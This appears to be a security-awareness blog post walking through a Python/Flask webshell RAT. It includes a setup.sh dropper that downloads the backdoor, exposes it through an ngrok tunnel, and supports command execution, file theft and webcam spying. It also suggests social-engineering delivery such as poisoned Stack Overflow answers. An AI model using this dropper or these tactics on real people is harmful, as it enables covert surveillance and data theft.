And take pictures of you while they are at it...

Malware is a threat computer users are used to dealing with – and we have been trained to be skeptical about attachments and links in emails, to keep our computers up to date and to run antivirus software. In spite of this – attackers can often get remote access to a victim’s computer with modest effort. Let’s have a look at one way this can be done.

Some people think they are safe from malware if they are using a Mac or a Linux computer. This is not true – we’ll show here how to create a remote access malware that will work on all those platforms – in a single file.

Is your computer letting the adversary in?

Getting the malware to the victim is often the most difficult thing. In this case, we are storing our “backdoor.py” webshell in an open Github repository: https://github.com/hakdo/things. This repo contains a single file called backdoor.py that sets up a Flask application to work as a webshell. This particular “malware” has the following endpoints:

  • /: Hello world
  • /downloads: will show you a listing of what is in the victim’s downloads folder. Works on both *nix and Windows.
  • /secret: only works on Windows, will enumerate all users in an AD domain.
  • /scary/<cmd>: a generic shell, will execute commands with the privileges of the logged on user.
  • /showme/<file>: a file exfiltration path allowing the attacker to download any file off the target computer

“Infecting” our victim

The trick is to get the user to run our webshell as a Flask application. We have created a setup.sh file to help with that. We call it “infection” because we are not actually exploiting any vulnerabilities here – we are just tricking the user to do things he or she shouldn’t be doing.

virtualenv --python=python3 evilenv
source evilenv/bin/activate
pip install flask
wget https://raw.githubusercontent.com/hakdo/things/master/backdoor.py
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-*.zip
./ngrok authtoken a_V3rY_S3cReT_tOkeN
export FLASK_APP="backdoor.py"
flask run &
./ngrok http 5000

What this little script does is it creates a virtual environment for Python and installs Flask (a web application microframework). Then it downloads the backdoor.py file (instead of cloning in case git is not present), then gets the reverse proxy ngrok from its source and unzips it. I then starts the app and sets up a reverse proxy tunnel to make the webshell available from the internet.

A technical note: ngrok is a reverse proxy that opens a tunnel to the internet. This is used a lot by web developers to showcase their work to clients and similar – but as we see here it can also easily be weaponized to create a hard-to-detect command and control network. This is often the case – useful tools are being made into dangerous weapons simply by changing the use case.

To get this done on someone’s computer we now need to give them the setup.sh file and have them execute it. None of this requires special privileges, so any user who executes the setup.sh script will be hacked. What are our options for getting this part done?

  • Emailing the script to a user and ask them to make it executable and run it from the terminal. Estimated success rate of this? Very low.
  • Embed the script within a malicious document and use social engineering to get the user to accept any security warnings. This is a standard practice on Windows with MS Office macros, but *nix users may be less likely to be fooled. PDF would perhaps be the most likely carrier doc (it can use embedded JavaScript)
  • A waterhole operation using a forum, such as Stack Overflow. Respond to a victim’s question for something, and present running setup.sh as the solution to some problem. There are many users in the Linux world who would happily copy and paste commands from the internet to their terminal.

Exploiting the victim

When the user has run the setup.sh script, what happens then? First we can go to our ngrok dashboard and see that a tunnel has been created:

There are two tunnels, one http and one https. Both will work.

We test the tunnel and we see that it is working

Our root endpoint says hello from the victim’s computer. This can be reached from anywhere on the internet.

Let us now try the /downloads to see if there is some juicy stuff in there….

I would probably guess that the victim does work in security here since the download folder contains Burp Suite (a security testing tool), our reverse proxy and a password list (Rockyou.txt)…

Let us also try the generic command endpoint. What command would you like to run?

Let’s see if this victim has fswebcam installed. This little beauty will take a picture using the webcam and save it in the location indicated. Can we do /scary/fswebcam spyimage.jpg ?

The threat from those sextortion emails could have been real – here’s an image taken of the author via the web interface and then extracted using a browser.

I don’t want hackers to watch me – what can I do?

Nobody wants that, and that’s not the only thing they could do through malware like this – a RAT – or remote access trojan. They could do anything that you could do on that computer:

  • Delete files, read files, steal files, place files there
  • Install software (depending on the need for sudo privileges)
  • Install keyloggers and other malware (OK, so now they have sudo rights too)
  • Use your identity to attack others

OK – obviously bad stuff. So what can we do about it? Avoiding malware is a puzzle with multiple pieces.

  1. Don’t trust links or attachments
  2. Don’t copy-paste things from Stack Overflow and other places into your terminal – at least not without understanding what it does
  3. Keep your computer up to date (but note that this malware was basically just using normal system tools – no exploitation involved)
  4. Always verify the source of an instruction if it at all seems strange – whether this is to disable security features or run strange commands on your computer.

Leave a Reply